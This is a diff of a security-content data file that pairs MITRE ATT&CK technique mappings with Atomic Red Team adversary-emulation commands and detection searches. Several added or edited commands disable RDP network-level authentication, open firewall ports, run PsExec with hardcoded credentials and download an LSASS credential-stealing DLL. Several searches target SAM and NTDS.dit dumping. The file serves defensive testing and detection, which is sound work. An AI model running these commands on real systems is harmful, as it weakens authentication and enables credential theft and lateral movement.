"mitre_attack_id": "T1190", + "mitre_attack_technique": "Exploit Public-Facing Application", + "mitre_attack_tactics": [ + "Initial Access" + ], + "mitre_attack_groups": [ + "APT28", + "APT29", + "APT39", + "APT41", + "Axiom", + "BackdoorDiplomacy", + "BlackTech", + "Blue Mockingbird", + "Dragonfly", + "Earth Lusca", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "HAFNIUM", + "Ke3chang", + "Kimsuky", + "Magic Hound", + "Moses Staff", + "MuddyWater", + "Rocke", + "Threat Group-3390", + "Volatile Cedar", + "menuPass" + ] + }, { "mitre_attack_id": "T1105", "mitre_attack_technique": "Ingress Tool Transfer", @@ -633643,18 +640587,26 @@ ] }, { - "mitre_attack_id": "T1069.002", - "mitre_attack_technique": "Domain Groups", + "mitre_attack_id": "T1059", + "mitre_attack_technique": "Command and Scripting Interpreter", "mitre_attack_tactics": [ - "Discovery" + "Execution" ], "mitre_attack_groups": [ + "APT19", + "APT32", + "APT37", + "APT39", "Dragonfly", - "Inception", + "FIN5", + "FIN6", + "FIN7", + "Fox Kitten", "Ke3chang", - "LAPSUS$", "OilRig", - "Turla" + "Stealth Falcon", + "Whitefly", + "Windigo" ] } ] @@ -635621,7 +642573,8 @@ "command_list": [ "$Server=$ENV:logonserver.TrimStart(\"\\\")\n$User = Join-Path $Env:USERDOMAIN $ENV:USERNAME\n$Password=\"1password2!\"\ncmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password\nmstsc /v:$Server\necho \"RDP connection established\"\n", "Set-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp' -name \"PortNumber\" -Value 4489\nNew-NetFirewallRule -DisplayName 'RDPPORTLatest-TCP-In' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort 4489\n", - "reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d 4489 /f\nnetsh advfirewall firewall add rule name=\"RDPPORTLatest-TCP-In\" dir=in action=allow protocol=TCP localport=4489\n" + "reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d 4489 /f\nnetsh advfirewall firewall add rule name=\"RDPPORTLatest-TCP-In\" dir=in action=allow protocol=TCP localport=4489\n", + "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /d 0 /t REG_DWORD /f\n" ], "commands": [], "queries": [], @@ -635726,6 +642679,26 @@ "name": "command_prompt", "elevation_required": true } + }, + { + "name": "Disable NLA for RDP via Command Prompt", + "auto_generated_guid": "01d1c6c0-faf0-408e-b368-752a02285cb2", + "description": "Disables network-level authentication (NLA) for RDP by changing a registry key via Command Prompt\nDisabling NLA for RDP can allow remote user interaction with the Windows sign-in screen prior to authentication. According to Microsoft, Flax Typhoon actors used this technique implementation to achieve persistence on victim systems: https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/\nSee also: https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/management/enable_rdp.py\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "Default_UserAuthentication": { + "description": "Default UserAuthentication registry value", + "type": "string", + "default": "1" + } + }, + "executor": { + "command": "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /d 0 /t REG_DWORD /f\n", + "cleanup_command": "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /d #{Default_UserAuthentication} /t REG_DWORD -f >nul 2>&1\n", + "name": "command_prompt" + } } ] } @@ -637570,7 +644543,7 @@ { "name": "Allow Inbound Traffic By Firewall Rule Registry", "description": "This analytic detects a potential suspicious modification of firewall rule registry allowing inbound traffic in specific port with public profile. This technique was identified when an adversary wants to grant remote access to a machine by allowing the traffic in a firewall rule.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\System\\\\CurrentControlSet\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\FirewallRules\\\\*\" Registry.registry_value_data = \"*|Action=Allow|*\" Registry.registry_value_data = \"*|Dir=In|*\" Registry.registry_value_data = \"*|LPort=*\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `allow_inbound_traffic_by_firewall_rule_registry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= \"*\\\\System\\\\CurrentControlSet\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\FirewallRules\\\\*\" Registry.registry_value_data = \"*|Action=Allow|*\" Registry.registry_value_data = \"*|Dir=In|*\" Registry.registry_value_data = \"*|LPort=*\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.dest Registry.user | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `allow_inbound_traffic_by_firewall_rule_registry_filter`", "tags": { "name": "Allow Inbound Traffic By Firewall Rule Registry", "analytic_story": [ @@ -637684,7 +644657,7 @@ ], "observable": [ { - "name": "user", + "name": "User", "type": "User", "role": [ "Victim" @@ -639235,7 +646208,7 @@ { "name": "Azure AD New Custom Domain Added", "description": "The following analytic identifies the addition of a new custom domain within an Azure Active Directory tenant. Adding a custom domain is a step required to set up the Azure Active Directory identity federation backdoor technique discovered by security researcher Nestori Syynimaa. Similar to Active Directory, Azure AD uses the concept of domains to manage directories of identities. A new Azure AD tenant will initially contain a single domain that is commonly called the `cloud-only` onmicrosoft.com domain. Organizations can also add their registered custom domains to Azure AD for email addresses to match the organizations domain name. If the organization intends to use a third-party identity provider such as ADFS for authentication, the added custom domains can be configured as federated. An adversary who has obtained privileged access to an Azure AD tenant may leverage this technique to establish persistence and be able to authenticate to Azure AD impersonating any user and bypassing the requirement to have a valid password and/or perform MFA.", - "search": " `azuread` body.operationName=\"Add unverified domain\" \"body.properties.result\"=success | rename body.properties.* as * | rename body.callerIpAddress as callerIpAddress | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.displayName as domain | stats values(domain) by _time, initiatedBy, result, body.operationName, callerIpAddress | `azure_ad_new_custom_domain_added_filter`", + "search": " `azuread` operationName=\"Add unverified domain\" \"properties.result\"=success | rename properties.* as * | rename callerIpAddress as callerIpAddress | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.displayName as domain | stats values(domain) by _time, initiatedBy, result, operationName, callerIpAddress | `azure_ad_new_custom_domain_added_filter`", "tags": { "name": "Azure AD New Custom Domain Added", "analytic_story": [ @@ -639293,7 +646266,7 @@ { "name": "Azure AD New Federated Domain Added", "description": "The following analytic identifies the addition of a new federated domain within an Azure Active Directory tenant. This event could represent the execution of the Azure Active Directory identity federation backdoor technique discovered by security researcher Nestori Syynimaa. Similar to Active Directory, Azure AD uses the concept of domains to manage directories of identities. A new Azure AD tenant will initially contain a single domain that is commonly called the `cloud-only` onmicrosoft.com domain. Organizations can also add their registered custom domains to Azure AD for email addresses to match the organizations domain name. If the organization intends to use a third-party identity provider such as ADFS for authentication, the added custom domains can be configured as federated. An adversary who has obtained privileged access to an Azure AD tenant may leverage this technique to establish persistence and be able to authenticate to Azure AD impersonating any user and bypassing the requirement to have a valid password and/or perform MFA.", - "search": " `azuread` body.operationName=\"Set domain authentication\" \"body.properties.result\"=success | rename body.properties.* as * | rename body.callerIpAddress as callerIpAddress | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.displayName as domain | stats values(domain) by _time, initiatedBy, result, body.operationName, callerIpAddress | `azure_ad_new_federated_domain_added_filter`", + "search": " `azuread` operationName=\"Set domain authentication\" \"properties.result\"=success | rename properties.* as * | rename callerIpAddress as callerIpAddress | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.displayName as domain | stats values(domain) by _time, initiatedBy, result, operationName, callerIpAddress | `azure_ad_new_federated_domain_added_filter`", "tags": { "name": "Azure AD New Federated Domain Added", "analytic_story": [ @@ -639943,8 +646916,8 @@ } ], "command_list": [ - "\\..\\ExternalPayloads\\msxsl.exe \\T1220\\src\\msxslxmlfile.xml \\T1220\\src\\msxslscript.xsl\n", - "\\..\\ExternalPayloads\\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl\n", + "\"\\..\\ExternalPayloads\\msxsl.exe\" \"\\T1220\\src\\msxslxmlfile.xml\" \"\\T1220\\src\\msxslscript.xsl\"\n", + "\"\\..\\ExternalPayloads\\msxsl.exe\" \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml\" \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl\"\n", "wmic process list /FORMAT:\"\\T1220\\src\\wmicscript.xsl\"\n", "wmic process list /FORMAT:\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl\"\n", "msxsl.exe", @@ -640027,23 +647000,23 @@ "dependencies": [ { "description": "XML file must exist on disk at specified location (#{xmlfile})\n", - "prereq_command": "if (Test-Path #{xmlfile}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction Ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml\" -OutFile \"#{xmlfile}\"\n" + "prereq_command": "if (Test-Path \"#{xmlfile}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{xmlfile}\") -ErrorAction Ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml\" -OutFile \"#{xmlfile}\"\n" }, { "description": "XSL file must exist on disk at specified location (#{xslfile})\n", - "prereq_command": "if (Test-Path #{xslfile}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{xslfile}) -ErrorAction Ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl\" -OutFile \"#{xslfile}\"\n" + "prereq_command": "if (Test-Path \"#{xslfile}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{xslfile}\") -ErrorAction Ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl\" -OutFile \"#{xslfile}\"\n" }, { "description": "msxsl.exe must exist on disk at specified location (#{msxsl_exe})\n", - "prereq_command": "if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1}\n", + "prereq_command": "if (Test-Path \"#{msxsl_exe}\") {exit 0} else {exit 1}\n", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe\" -OutFile \"#{msxsl_exe}\"\n" } ], "executor": { - "command": "#{msxsl_exe} #{xmlfile} #{xslfile}\n", - "cleanup_command": "del #{msxsl_exe} >nul 2>&1\n", + "command": "\"#{msxsl_exe}\" \"#{xmlfile}\" \"#{xslfile}\"\n", + "cleanup_command": "del \"#{msxsl_exe}\" >nul 2>&1\n", "name": "command_prompt" } }, @@ -640074,13 +647047,13 @@ "dependency_executor_name": "powershell", "dependencies": [ { - "description": "msxsl.exe must exist on disk at specified location (#{msxsl_exe})\n", - "prereq_command": "if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1}\n", + "description": "msxsl.exe must exist on disk at specified location (\"#{msxsl_exe}\")\n", + "prereq_command": "if (Test-Path \"#{msxsl_exe}\") {exit 0} else {exit 1}\n", "get_prereq_command": "Invoke-WebRequest \"https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe\" -OutFile \"#{msxsl_exe}\"\n" } ], "executor": { - "command": "#{msxsl_exe} #{xmlfile} #{xslfile}\n", + "command": "\"#{msxsl_exe}\" \"#{xmlfile}\" \"#{xslfile}\"\n", "cleanup_command": "del -Path #{msxsl_exe} >nul 2>&1\n", "name": "command_prompt" } @@ -640108,8 +647081,8 @@ "dependencies": [ { "description": "XSL file must exist on disk at specified location (#{local_xsl_file})\n", - "prereq_command": "if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction Ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl\" -OutFile \"#{local_xsl_file}\"\n" + "prereq_command": "if (Test-Path \"#{local_xsl_file}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{local_xsl_file}\") -ErrorAction Ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl\" -OutFile \"#{local_xsl_file}\"\n" } ], "executor": { @@ -641203,7 +648176,7 @@ { "name": "Disable Show Hidden Files", "description": "The following analytic is to identify a modification in the Windows registry to prevent users from seeing all the files with hidden attributes. This event or techniques are known on some worm and trojan spy malware that will drop hidden files on the infected machine.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt\" Registry.registry_value_data = \"0x00000001\") OR (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden\" Registry.registry_value_data = \"0x00000000\")) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_show_hidden_files_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden\" OR Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt\" Registry.registry_value_data = \"0x00000001\") OR (Registry.registry_path= \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden\" Registry.registry_value_data = \"0x00000000\")) BY _time span=1h Registry.user Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`| where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_show_hidden_files_filter`", "tags": { "name": "Disable Show Hidden Files", "analytic_story": [ @@ -643276,7 +650249,7 @@ { "name": "Creation of Shadow Copy with wmic and powershell", "description": "This search detects the use of wmic and Powershell to create a shadow copy.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_wmic` OR `process_powershell` Processes.process=*shadowcopy* Processes.process=*create* by Processes.user Processes.process_name Processes.original_file_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `creation_of_shadow_copy_with_wmic_and_powershell_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_wmic` OR `process_powershell` Processes.process=*shadowcopy* Processes.process=*create* by Processes.user Processes.process_name Processes.original_file_name Processes.parent_process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `creation_of_shadow_copy_with_wmic_and_powershell_filter`", "tags": { "name": "Creation of Shadow Copy with wmic and powershell", "analytic_story": [ @@ -643313,20 +650286,6 @@ "role": [ "Victim" ] - }, - { - "name": "parent_process_name", - "type": "Process", - "role": [ - "Parent Process" - ] - }, - { - "name": "process_name", - "type": "Process", - "role": [ - "Child Process" - ] } ], "risk_score": 81, @@ -643378,7 +650337,7 @@ { "name": "Credential Dumping via Copy Command from Shadow Copy", "description": "This search detects credential dumping using copy command from a shadow copy.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` (Processes.process=*\\\\system32\\\\config\\\\sam* OR Processes.process=*\\\\system32\\\\config\\\\security* OR Processes.process=*\\\\system32\\\\config\\\\system* OR Processes.process=*\\\\windows\\\\ntds\\\\ntds.dit*) by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `credential_dumping_via_copy_command_from_shadow_copy_filter` ", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` (Processes.process=*\\\\system32\\\\config\\\\sam* OR Processes.process=*\\\\system32\\\\config\\\\security* OR Processes.process=*\\\\system32\\\\config\\\\system* OR Processes.process=*\\\\windows\\\\ntds\\\\ntds.dit*) by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process Processes.original_file_name Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `credential_dumping_via_copy_command_from_shadow_copy_filter` ", "tags": { "name": "Credential Dumping via Copy Command from Shadow Copy", "analytic_story": [ @@ -643413,20 +650372,6 @@ "role": [ "Victim" ] - }, - { - "name": "parent_process_name", - "type": "Process", - "role": [ - "Parent Process" - ] - }, - { - "name": "process_name", - "type": "Process", - "role": [ - "Child Process" - ] } ], "risk_score": 81, @@ -643478,7 +650423,7 @@ { "name": "Credential Dumping via Symlink to Shadow Copy", "description": "This search detects the creation of a symlink to a shadow copy.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` Processes.process=*mklink* Processes.process=*HarddiskVolumeShadowCopy* by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `credential_dumping_via_symlink_to_shadow_copy_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` Processes.process=*mklink* Processes.process=*HarddiskVolumeShadowCopy* by Processes.dest Processes.user Processes.process_name Processes.process Processes.parent_process Processes.parent_process_name Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `credential_dumping_via_symlink_to_shadow_copy_filter`", "tags": { "name": "Credential Dumping via Symlink to Shadow Copy", "analytic_story": [ @@ -643513,20 +650458,6 @@ "role": [ "Victim" ] - }, - { - "name": "parent_process_name", - "type": "Process", - "role": [ - "Parent Process" - ] - }, - { - "name": "process_name", - "type": "Process", - "role": [ - "Child Process" - ] } ], "risk_score": 81, @@ -647636,7 +654567,8 @@ "Qakbot", "IcedID", "Azorult", - "Remcos" + "Remcos", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -648188,7 +655120,7 @@ "dependencies": [ { "description": "lsass_lib.dll must exist on disk at specified location (#{dll_path})\n", - "prereq_command": "if (Test-Path #{dll_path}) {exit 0} else {exit 1}\n", + "prereq_command": "if (Test-Path \"#{dll_path}\") {exit 0} else {exit 1}\n", "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/oxfemale/LogonCredentialsSteal/raw/53e74251f397ddeab2bd1348c3ff26d702cfd836/lsass_lib/x64/Release/lsass_lib.dll\" -UseBasicParsing -OutFile \"#{dll_path}\"\n" } ], @@ -648548,7 +655480,7 @@ ], "command_list": [ "sc.exe create ARTService binPath= \"%COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\\art-marker.txt\"\nsc.exe start ARTService\nsc.exe delete ARTService\n", - "\\..\\ExternalPayloads\\PsExec.exe \\\\localhost -u DOMAIN\\Administrator -p P@ssw0rd1 -accepteula \"C:\\Windows\\System32\\calc.exe\"\n", + "\"\\..\\ExternalPayloads\\PsExec.exe\" \\\\localhost -u DOMAIN\\Administrator -p P@ssw0rd1 -accepteula \"C:\\Windows\\System32\\calc.exe\"\n", "psexec.py '#{domain}/Administrator:P@ssw0rd1@127.0.0.1' 'whoami'\n", "cmd.exe /c \"wmic \tcsproduct \tget UUID\" \ncmd.exe /c \"fsutil behavior \tset SymlinkEvaluation R2L:1\" \ncmd.exe /c \"fsutil behavior set \tSymlinkEvaluation R2R:1\"\nreg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f \ncopy \"\\..\\ExternalPayloads\\PsExec.exe\" $env:temp\ncmd.exe /c \"$env:temp\\psexec.exe -accepteula \\\\$ENV:COMPUTERNAME cmd.exe /c echo \"--access-token\"\"\n", "\"\\..\\ExternalPayloads\\remcom.exe\" \\\\localhost /user:Administrator /pwd:P@ssw0rd1 cmd.exe\n", @@ -648620,11 +655552,11 @@ { "description": "PsExec tool from Sysinternals must exist in the ExternalPayloads directory\n", "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\") { exit 0} else { exit 1}\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\"\nExpand-Archive PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools -Force\nCopy-Item PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\\PsExec.exe \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\" -Force\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\"\nExpand-Archive \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\" -Force\nCopy-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\\PsExec.exe\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\" -Force\n" } ], "executor": { - "command": "PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe \\\\#{remote_host} -u #{user_name} -p #{password} -accepteula \"C:\\Windows\\System32\\calc.exe\"\n", + "command": "\"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\" \\\\#{remote_host} -u #{user_name} -p #{password} -accepteula \"C:\\Windows\\System32\\calc.exe\"\n", "name": "command_prompt" } }, @@ -648693,7 +655625,7 @@ { "description": "PsExec must exist on disk at \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\"\n", "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\") {exit 0} else {exit 1}\n", - "get_prereq_command": "Invoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\"\nExpand-Archive PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools -Force\nNew-Item -ItemType Directory (Split-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\") -Force | Out-Null\nCopy-Item PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\\PsExec.exe \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\" -Force\n" + "get_prereq_command": "Invoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\"\nExpand-Archive \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\" -Force\nNew-Item -ItemType Directory (Split-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\") -Force | Out-Null\nCopy-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\\PsExec.exe\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\" -Force\n" } ], "executor": { @@ -649339,7 +656271,7 @@ { "name": "Malicious Powershell Executed As A Service", "description": "This detection is to identify the abuse the Windows SC.exe to execute malicious commands or payloads via PowerShell.", - "search": " `wineventlog_system` EventCode=7045 | eval l_Service_File_Name=lower(Service_File_Name) | regex l_Service_File_Name=\"powershell[.\\s]|powershell_ise[.\\s]|pwsh[.\\s]|psexec[.\\s]\" | regex l_Service_File_Name=\"-nop[rofile\\s]+|-w[indowstyle]*\\s+hid[den]*|-noe[xit\\s]+|-enc[odedcommand\\s]+\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Service_File_Name Service_Name Service_Start_Type Service_Type Service_Account user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `malicious_powershell_executed_as_a_service_filter`", + "search": " `wineventlog_system` EventCode=7045 | eval l_Service_File_Name=lower(Service_File_Name) | regex l_Service_File_Name=\"powershell[.\\s]|powershell_ise[.\\s]|pwsh[.\\s]|psexec[.\\s]\" | regex l_Service_File_Name=\"-nop[rofile\\s]+|-w[indowstyle]*\\s+hid[den]*|-noe[xit\\s]+|-enc[odedcommand\\s]+\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Service_File_Name Service_Name Service_Start_Type Service_Type Service_Account user dest| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `malicious_powershell_executed_as_a_service_filter`", "tags": { "name": "Malicious Powershell Executed As A Service", "analytic_story": [ @@ -649415,7 +656347,7 @@ { "name": "Windows Service Create SliverC2", "description": "When an adversary utilizes SliverC2 to laterally move with the Psexec module, it will create a service with the name and description of \"Sliver\" and \"Sliver Implant\". Note that these may be easily changed and are specific to only SliverC2. We have also created the same regex as Microsoft has outlined to attempt to capture the suspicious service path (regex101 reference).", - "search": "`wineventlog_system` EventCode=7045 ServiceName=\"sliver\" | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ImagePath ServiceName ServiceType | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_service_create_sliverc2_filter`", + "search": "`wineventlog_system` EventCode=7045 ServiceName=\"sliver\" | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ImagePath ServiceName ServiceType | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_service_create_sliverc2_filter`", "tags": { "name": "Windows Service Create SliverC2", "analytic_story": [ @@ -649428,7 +656360,7 @@ "kill_chain_phases": [ "Installation" ], - "message": "A user mode service was created on $ComputerName$ related to SliverC2.", + "message": "A user mode service was created on $dest$ related to SliverC2.", "mitre_attack_id": [ "T1569", "T1569.002" @@ -649438,7 +656370,7 @@ ], "observable": [ { - "name": "ComputerName", + "name": "dest", "type": "Endpoint", "role": [ "Victim" @@ -649492,7 +656424,8 @@ "Active Directory Lateral Movement", "Brute Ratel C4", "Qakbot", - "Snake Malware" + "Snake Malware", + "Flax Typhoon" ], "asset_type": "Endpoint", "cis20": [ @@ -649571,7 +656504,7 @@ { "name": "Windows Snake Malware Service Create", "description": "The following analytic identifies a new service WerFaultSvc being created with a binary path located in the windows winsxs path. Per the report, the Snake version primarily discussed in this advisory registers a service to maintain persistence on a system. Typically this service is named WerFaultSvc which we assess was used to blend in with the legitimate Windows service WerSvc. On boot, this service will execute Snakes WerFault.exe, which Snake developers chose to hide among the numerous valid Windows WerFault.exe files in the windows WinSxS directory. Executing WerFault.exe will start the process of decrypting Snakes components and 